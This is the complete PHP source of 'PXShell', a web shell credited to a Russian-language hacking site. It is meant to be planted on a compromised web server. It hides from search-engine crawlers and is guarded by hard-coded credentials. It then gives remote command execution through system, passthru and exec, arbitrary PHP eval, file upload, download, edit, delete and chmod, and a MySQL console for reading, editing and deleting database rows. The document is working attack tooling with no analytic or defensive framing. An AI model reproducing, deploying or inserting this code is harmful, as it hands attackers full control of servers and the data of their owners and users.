Автор: Morph
www.pyccxak.com
<? error_reporting(0); $getsm=ini_get('safe_mode'); $getmq=ini_get('magic_quotes_gpc'); $auth=1; /*Login && password check*/ $login='PyccXak'; $password='Test'; if (strstr(strtolower($_SERVER['HTTP_USER_AGENT'],'yand')) || strstr(strtolower($_SERVER['HTTP_USER_AGENT']),'goog') || strstr(strtolower($_SERVER['HTTP_USER_AGENT']),'ram') || strstr(strtolower($_SERVER['HTTP_USER_AGENT']),'msn')) die(); if($auth==1) { if(!isset($_SERVER['PHP_AUTH_USER'])) { header('WWW-Authenticate: Basic realm="Are you kreved?"'); header('HTTP/1.0 401 Unauthorized'); die(); } if ($_SERVER['PHP_AUTH_USER']!=$login || $_SERVER['PHP_AUTH_PW']!=$password) die(); } switch($getmq) { case true: $statmq='<font color="red"><b>On</b></font>'; $smmq=1; break; case false: $statmq='<font color="gray"><b>Off</b></font>'; $smmq=0; break; } switch($getsm) { case true: $statsm='<font color="red"><b>On</b></font>'; $smc=1; break; case false: $statsm='<font color="gray"><b>Off</b></font>'; $smc=0; break; } if (!isset($_POST['dir'])) { $dir=getcwd(); $curd=$dir; } else { if ($_POST['dir']!='') $dir=getcwd(); $dir=$_POST['dir']; if ($getmq==true) $curd=htmlspecialchars(stripslashes($_POST['dir'])); if ($getmq==false) $curd=htmlspecialchars($_POST['dir']); } if (isset($_POST['downlfile'])) { if (file_exists($curd.'/'.$_POST['downlfile'])) { header('Content-type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$_POST['downlfile'].'"'); readfile($curd.'/'.$_POST['downlfile']); die(); } else { $readf=1; } } echo '<title>PXShell</title>'; echo '<b>Magic Quotes:</b> '.$statmq.' '; echo '<b>Safe Mode:</b> '.$statsm.' '; echo '<b>OS:</b> <font color="gray"><b>'.PHP_OS.'</b></font> '; if (PHP_VERSION>=4) echo '<font color="gray"><b>'.php_uname().'</b></font> '; echo '<b>Php Version</b>: <font color="gray"><b>'.PHP_VERSION.'</b></font> '; echo '<br/><hr><br/>'; if (isset($readf)) echo '<center><font color="red"><b>File Not Found</b></font></center><br/>'; if (isset($_POST['user'])) { echo '<style> input {border:#cccccc 1px solid; font:12px Verdana; color:#000000; margin:1px; width:100px} textarea {border:#cccccc 1px solid; font:12px Verdana; color:#000000; margin:1px; width:100%; height:60%} table {border:#cccccc 2px solid; font:12px Verdana; color:#000000; margin:1px;} </style>'; } if (!isset($_POST['user'])) { echo '<style> input {border:#cccccc 1px solid; font:12px Verdana; color:#000000; margin:1px; width:200px} textarea {border:#cccccc 1px solid; font:12px Verdana; color:#000000; margin:1px; width:100%; height:60%} table {border:#cccccc 2px solid; font:12px Verdana; color:#000000; margin:1px;} </style>'; } if (!isset($_POST['user'])) { if (isset($_POST['system']) && isset($_POST['systp'])) { echo '<form method="post"> <input type="text" name="system" value="" /> <select name="systp"> <option value="0"'; if ($_POST['systp']==0) echo 'selected="selected"'; echo '>system</option> <option value="1"'; if ($_POST['systp']==1) echo 'selected="selected"'; echo '>passthru</option> <option value="2"'; if ($_POST['systp']==2) echo 'selected="selected"'; echo '>exec</option> </select> <input type="submit" value="System" class="button" /> </form>'; echo '<center>'.htmlspecialchars($_POST['system']).'</center><textarea>'; if ($_POST['systp']==0) { if($getmq==false) system($_POST['system']); if($getmq==true) system(stripslashes($_POST['system'])); } if ($_POST['systp']==1) { if($getmq==false) passthru($_POST['system']); if($getmq==true) passthru(stripslashes($_POST['system'])); } if ($_POST['systp']==2) { if($getmq==false) exec($_POST['system']); if($getmq==true) exec(stripslashes($_POST['system'])); } echo '</textarea><br/>'; } if (isset($_POST['eval'])) { echo '<form method="post"><textarea name="eval"></textarea><input type="submit" value="Php Eval" class="button" /></form>'; echo '<textarea>'; if($getmq==true) eval(stripslashes($_POST['eval'])); if($getmq==false) eval($_POST['eval']); echo '</textarea><br/>'; } if (isset($_POST['disab'])) { echo '<textarea>'; echo ini_get("disable_functions"); echo '</textarea><br/>'; } if (isset($_POST['chmod'])) { $chmdok=chmod($curd.'/'.$_POST['chmod'],intval($_POST['val'])); if ($chmdok==true) { echo '<b><center><font color="green">Ok</font></center></b>'; } else {echo '<b><center><font color="red">Failed</font></center></b>'; } } if (isset($_POST['unlink'])) { $delf=unlink($curd.'/'.$_POST['unlink']); if ($delf==true) { echo '<b><center><font color="green">Deleted</font></center></b>'; } else {echo '<b><center><font color="red">Failed</font></center></b>'; } } if (isset($_POST['phpinfo'])) { phpinfo(); } if(isset($_FILES['uploadf'])) { $filnewn=$_FILES['uploadf']['name']; if ($_POST['filen']!='') $filnewn=$_POST['filen']; if (move_uploaded_file($_FILES['uploadf']['tmp_name'], $curd.'/'.$filnewn)) { echo '<center><font color="green"><B>File Uploaded</B></font></center>'; } else { echo '<center><font color="red"><b>Upload Failed</b></font></center>'; } } if (isset($_POST['edit']) && isset($_POST['dir'])) { if(is_readable($curd.'/'.$_POST['edit'])) { $fet=fopen($curd.'/'.$_POST['edit'],'r'); $txed=fread($fet,filesize($curd.'/'.$_POST['edit'])); echo '<b>File: </b>'.$curd.'/'.$_POST['edit']; if (is_writable($curd.'/'.$_POST['edit'])) { echo '<form method="post">'; } echo '<textarea name="texted" margin="2" width="150">'.htmlspecialchars($txed).'</textarea>'; fclose($fet); if (is_writable($curd.'/'.$_POST['edit'])) { echo '<center><input type="hidden" name="filename" value="'.htmlspecialchars($_POST['edit']).'" /><input type="hidden" value="'.$curd.'" name="dir" /><input type="submit" value="Save" class="button" /></center> </form>'; } } } if (isset($_POST['texted'])) { $wrf=fopen($curd.'/'.$_POST['filename'],'w'); if ($getmq==false){ if (fwrite($wrf,$_POST['texted'])!=false) { echo '<center><b>File Saved</b></center>'; } else { echo '<center><font color="red"><b>Error!</b></font></center>'; } } if ($getmq==true){ if (fwrite($wrf,stripslashes($_POST['texted']))!=false) { echo '<center><b>File Saved</b></center>'; } else { echo '<center><font color="red"><b>Error!</b></font></center>'; } } fclose($wrf); } if (!isset($_POST['edit']) && !isset($_POST['system']) && !isset($_POST['eval']) && !isset($_POST['phpinfo']) && !isset($_POST['disab'])) { if ($files = opendir($dir)) { while (($filel = readdir($files)) !== false) { $fils=lstat($curd.'/'.$filel); $getfr=is_readable($curd.'/'.$filel); $getfw=is_writable($curd.'/'.$filel); switch($getfr){ case 1: $statr='<font color="gray">R</font>'; break; case 0: $statr='<font color="red"><b>N</b></font>'; break; } switch($getfw){ case 1: $statw='<font color="orange">W</font>'; break; case 0: $statw='<font color="red"><b>N</b></font>'; break; } switch(filetype($curd.'/'.$filel)) { case 'dir': $filt='<font color="pink">Dir</font>'; break; case 'file': $filt='<font color="green">File</font>'; break; } print '<b>File: </b>'.$filel.' '.$filt.' '.$statr.' '.$statw.' <b>LC:</b> '.date("m.d.Y H:i:s",$fils['mtime']).' <b>Size: </b>'.$fils['size'].'<br/>'; clearstatcache(); } closedir($files); } echo '<hr>'; } echo '<form method="post"> <input type="text" name="dir" value="'.$curd.'" /> <input type="submit" value="Change Dir" class="button" /> </form>'; echo '<form method="post"> <input type="text" name="edit" value="" /> <input type="hidden" name="dir" value="'.$curd.'" /> <input type="submit" value="Edit" class="button" /> </form>'; if ($smc==0 && !isset($_POST['system'])) { echo '<form method="post"> <input type="text" name="system" value="" /> <input type="submit" value="System" class="button" /> <select name="systp"> <option value="0">system</option> <option value="1" selected="selected">passthru</option> <option value="2">exec</option> </select> </form>'; } echo '<form method="post"> <input type="text" name="unlink" value=""/> <input type="hidden" value="'.$curd.'" name="dir" /> <input type="submit" value="Delete File" /> </form>'; echo '<form method="post"> <input type="text" name="downlfile" value="" /> <input type="hidden" name="dir" value="'.$curd.'" /> <input type="submit" value="Download File" class="button" /> </form><hr>'; echo '<form method="post"> <b>Filename: </b><input type="text" name="chmod" value=""/> <input type="hidden" value="'.$curd.'" name="dir" /> <b>Perm: </b><input type="text" name="val" value=""/> <input type="submit" value="Chmod" /> </form>'; echo '<form enctype="multipart/form-data" method="post"> <b>File: </b><input name="uploadf" type="file" /> <input type="hidden" value="'.$curd.'" name="dir" /> <b>New Filename:</b> <input type="text" name="filen" value="" /> <input type="submit" value="Upload" /> </form>'; if (!isset($_POST['phpinfo'])) { echo '<form method="post"> <input type="hidden" name="phpinfo" value=""/> <input type="submit" value="phpinfo();" /> </form>'; } if (!isset($_POST['disab'])) { echo '<form method="post"> <input type="hidden" name="disab" value=""/> <input type="submit" value="Disabled Functions" /> </form>'; } if (!isset($_POST['eval']) && $smc==0) { echo '<form method="post"><textarea name="eval" width="100%" height=100> </textarea> <input type="submit" value="Php Eval" class="button" /> </form>'; } } if (!isset($_POST['user'])) { echo '<form method="post"> <b>User:</b> <input type="text" name="user" value=""/><BR/> <b>Password:</b> <input type="text" name="password" value=""/><br/> <b>Server:</b> <input type="text" name="serv" value=""/><br/> <input type="submit" value="Mysql Connect" /> </form>'; } if (isset($_POST['user']) && isset($_POST['password']) && isset($_POST['serv'])) { $conn=mysql_connect($_POST['serv'],$_POST['user'],$_POST['password']) or die("Could not connect: " . mysql_error()); if (isset($_POST['serv'])) echo '<center><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="submit" value="BD" /> </form></center>'; echo '<center><form method="post"> <input type="submit" value="Exit" /> </form></center>'; if (isset($_POST['bd'])) echo '<center><b>DataBase: '.htmlspecialchars($_POST['bd']).'</b><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="submit" value="Table" /> </form></center>'; if (isset($_POST['tabl'])) echo '<center><b>Table: '.htmlspecialchars($_POST['tabl']).'</b></center>'; if (!isset($_POST['bd']) && !isset($_POST['tabl'])) { $showbd=mysql_query("SHOW DATABASES"); while($bds=mysql_fetch_array($showbd)) { echo '<b>'.$bds[0].'</b><br/>'; } unset($bds); mysql_free_result($showbd); } if (isset($_POST['bd'])) { mysql_select_db($_POST['bd'],$conn) or die('<font color="red"><b>Cant Select Database</b></font>'); $showtab=mysql_query("SHOW TABLES"); if (!isset($_POST['tabl'])) { while($bdst=mysql_fetch_array($showtab)) { echo '<b>'.$bdst[0].'</b><br/>'; } unset($bdst); mysql_free_result($showtab); } } if (!isset($_POST['bd'])) { echo '<br/><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="text" name="bd" value=""/> <input type="submit" value="Show" /> </form>'; } if (!isset($_POST['tabl']) && isset($_POST['bd'])) { echo '<br/><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="text" name="tabl" value=""/> <input type="submit" value="Show" /> </form>'; } if(isset($_POST['sql'])) { echo '<body> <table width="100%" height="0" border="1"> <tr>'; if($getmq==true) $usquer=mysql_query(stripslashes($_POST['sql'])); if($getmq==false) $usquer=mysql_query($_POST['sql']); if($usquer!=FALSE) { while($usar=mysql_fetch_row($usquer)) { $counusa=count($usar); for($x=0;$x<$counusa;$x++) { echo '<td>'.$usar[$x].'</td>'; } echo '</tr>'; } echo '</table></body>'; mysql_free_result($usquer); } else { echo mysql_error();} } if (isset($_POST['tabl'])) { if($getmq==true) $getcodx=mysql_query("SELECT * FROM ".stripslashes($_POST['tabl'])); if($getmq==false) $getcodx=mysql_query("SELECT * FROM ".$_POST['tabl']); $getconux=mysql_num_rows($getcodx); mysql_free_result($getcodx); if (isset($_POST['del'])) { $faid=true; if($getmq==true) $del=mysql_query("DELETE FROM `".$_POST['tabl']."` WHERE ".stripslashes($_POST['del'])) or $faid=false; if($getmq==false) $del=mysql_query("DELETE FROM `".$_POST['tabl']."` WHERE ".$_POST['del']) or $faid=false; switch($faid) { case true: $statde='<br/><B><center>Deleted</center></b><br/>'; break; case false: $statde='<br/><B><center>Failed</center></b><br/>'; break; } echo $statde; } if (isset($_POST['countp'])) { $tablsc=mysql_query("SHOW COLUMNS FROM ".$_POST['tabl']); $setparal=''; $numpar=0; $ddd=''; while($tablnupd=mysql_fetch_array($tablsc)) { $changed=true; $setpar='`'.$tablnupd[0].'`=\''.addslashes($_POST['param'.$numpar]).'\''; $setparal.=$setpar; if ($numpar<$_POST['countp']-1) $setparal.=$ddd.','; $numpar++; } if($getmq==true) $updedit=mysql_query("UPDATE ".$_POST['tabl'].' SET '.stripslashes(mysql_real_escape_string($setparal)).' WHERE '.stripslashes($_POST['edit'])." LIMIT 1") or $changed=false; if($getmq==false) $updedit=mysql_query("UPDATE ".$_POST['tabl'].' SET '.$setparal.' WHERE '.$_POST['edit']." LIMIT 1") or $changed=false; switch($changed) { case true: $statde='<br/><B><center>Changed</center></b><br/>'; break; case false: $statde='<br/><B><center>Failed</center></b><br/>'; break; } echo $statde; echo '<center><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/>'; if (isset($_POST['st']) && isset($_POST['en'])) echo '<input type="hidden" name="st" value="'.intval($_POST['st']).'"/> <input type="hidden" name="en" value="'.intval($_POST['en']).'"/>'; echo ' <input type="submit" value="Back" /> </form> </center>'; mysql_free_result($tablsc); } if (isset($_POST['edit']) && !isset($_POST['countp'])) { if($getmq==false) $editx=mysql_query("SELECT * FROM `".$_POST['tabl']."` WHERE ".$_POST['edit']) or $faid=false; if($getmq==true) $editx=mysql_query("SELECT * FROM `".$_POST['tabl']."` WHERE ".stripslashes($_POST['edit'])) or $faid=false; $Tabls=mysql_query("SHOW COLUMNS FROM ".$_POST['tabl']); echo '<body> <table width="100%" height="100" border="1"> <tr>'; while($tablnamed=mysql_fetch_row($Tabls)) { echo '<th scope="col">'.$tablnamed[0].'</th>'; } echo '<th scope="col"><font color="green">Save</font></th>'; echo '</tr>'; echo '<form method="post">'; while($edtex=mysql_fetch_row($editx)) { $coued=count($edtex); for ($ccx=0;$ccx<$coued;$ccx++) { echo '<td><center> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> <input type="hidden" name="edit" value="'; if($getmq==false) echo htmlspecialchars($_POST['edit']); if($getmq==true) echo htmlspecialchars(stripslashes($_POST['edit'])); echo '"/> <input type="hidden" name="countp" value="'; if($getmq==true) echo stripslashes($coued); if($getmq==false) echo $coued; echo '"/>'; if (isset($_POST['st']) && isset($_POST['en'])) echo '<input type="hidden" name="st" value="'.intval($_POST['st']).'"/> <input type="hidden" name="en" value="'.intval($_POST['en']).'"/>'; echo '<textarea name="param'.$ccx.'">'.$edtex[$ccx].'</textarea> </center></td>'; } echo '<td><center><input type="submit" value="Edit" /> </form></center></td>'; } mysql_free_result($editx); mysql_free_result($Tabls); } echo '</table> </body>'; if (!isset($_POST['edit'])) echo '<center><b>Nums: '.$getconux.'</b></center>'; if (!isset($_POST['en']) && !isset($_POST['st']) && !isset($_POST['edit'])) { mysql_select_db($_POST['bd'],$conn) or die('<font color="red"><b>Cant Select Database</b></font>'); $showtab=mysql_query("SHOW COLUMNS FROM ".$_POST['tabl']); $counc=mysql_num_rows($showtab); echo '<body> <table width="100%" height="100" border="1"> <tr>'; $namcol=''; while($bdsta=mysql_fetch_array($showtab)) { echo '<th scope="col">'.$bdsta[0].'</th>'; $namcol.=" .px. ".$bdsta[0]; } echo '<th scope="col"><font color="green">Edit</font></th><th scope="col"><font color="green">Delete</font></th> </tr>'; unset($bdsta); $showdan=mysql_query("SELECT * FROM ".$_POST['tabl']." LIMIT 0,30"); while($bddans=mysql_fetch_array($showdan)) { echo '<tr>'; $par=explode(" .px. ",$namcol); $del=''; for($cc=0;$cc<$counc;$cc++) { echo '<td>'.$bddans[$cc].'</td>'; $del.=$par[$cc+1].'=\''.addslashes($bddans[$cc]).'\''; if ($cc<$counc-1) $del=$del.' AND '; } $del=str_replace('"','"',$del); echo '<td><center> <form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> <input type="hidden" name="edit" value="'.$del.'"/> <input type="submit" value="Edit" /> </form> </center></td>'; echo '<td><center><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> <input type="hidden" name="del" value="'.$del.'"/> <input type="submit" value="Del" /> </form></center></td>'; echo '</tr>'; } echo '</table> </body>'; unset($bddans); mysql_free_result($showtab); echo '<br/><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> LIMIT <input type="text" name="st" value="0"/>, <input type="text" name="en" value="30"/> <input type="submit" value="Show" /> </form>'; } if (isset($_POST['st']) && isset($_POST['en']) && !isset($_POST['edit'])) { mysql_select_db($_POST['bd'],$conn) or die('<font color="red"><b>Cant Select Database</b></font>'); $showtab=mysql_query("SHOW COLUMNS FROM ".$_POST['tabl']); $counc=mysql_num_rows($showtab); echo '<body> <table width="100%" height="100" border="1"> <tr>'; $namcol=''; while($bdsta=mysql_fetch_array($showtab)) { echo '<th scope="col">'.$bdsta[0].'</th>'; $namcol.=" .px. ".$bdsta[0]; } echo '<th scope="col"><font color="green">Edit</font></th><th scope="col"><font color="green">Delete</font></th> </tr>'; unset($bdsta); $showdan=mysql_query("SELECT * FROM ".$_POST['tabl']." LIMIT ".intval($_POST['st']).",".intval($_POST['en']).""); while($bddans=mysql_fetch_array($showdan)) { echo '<tr>'; $par=explode(" .px. ",$namcol); $del=''; for($cc=0;$cc<$counc;$cc++) { echo '<td>'.$bddans[$cc].'</td>'; $del.=$par[$cc+1].'=\''.addslashes($bddans[$cc]).'\''; if ($cc<$counc-1) $del=$del.' AND '; } $del=str_replace('"','"',$del); echo '<td><center> <form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> <input type="hidden" name="edit" value="'.$del.'"/> <input type="hidden" name="st" value="'.htmlspecialchars($_POST['st']).'"/> <input type="hidden" name="en" value="'.htmlspecialchars($_POST['en']).'"/> <input type="submit" value="Edit" /> </form> </center></td>'; echo '<td><center><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> <input type="hidden" name="del" value="'.$del.'"/> <input type="submit" value="Del" /> </form></center></td>'; echo '</tr>'; } mysql_free_result($showdan); echo '</table> </body>'; unset($bddans); $start='30'; $end='0'; if (isset($_POST['st']) && isset($_POST['en'])) { $end=intval($_POST['en']); $start=intval($_POST['st']); } echo '<br/><form method="post"> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="hidden" name="tabl" value="'.htmlspecialchars($_POST['tabl']).'"/> LIMIT <input type="text" name="st" value="'.$start.'"/>, <input type="text" name="en" value="'.$end.'"/> <input type="submit" value="Show" /> </form>'; } } if (isset($_POST['bd'])) { $zapr=''; if (isset($_POST['sql'])) { if ($getmq==true) $zapr=htmlspecialchars(stripslashes($_POST['sql'])); if ($getmq==false) $zapr=htmlspecialchars($_POST['sql']); } echo '<br/><form method="post"> <textarea name="sql">'.$zapr.'</textarea> <input type="hidden" name="user" value="'.htmlspecialchars($_POST['user']).'"/> <input type="hidden" name="password" value="'.htmlspecialchars($_POST['password']).'"/> <input type="hidden" name="serv" value="'.htmlspecialchars($_POST['serv']).'"/> <input type="hidden" name="bd" value="'.htmlspecialchars($_POST['bd']).'"/> <input type="submit" value="Query" /> </form>'; } } echo '<br/><br/><hr><center>'; echo '</center><center><b><font size=2><font color="Red">P</font>ycc<font color="Red">X</font>ak.Com © m<font color="green">O</font>rph</font></b></center>'; ?>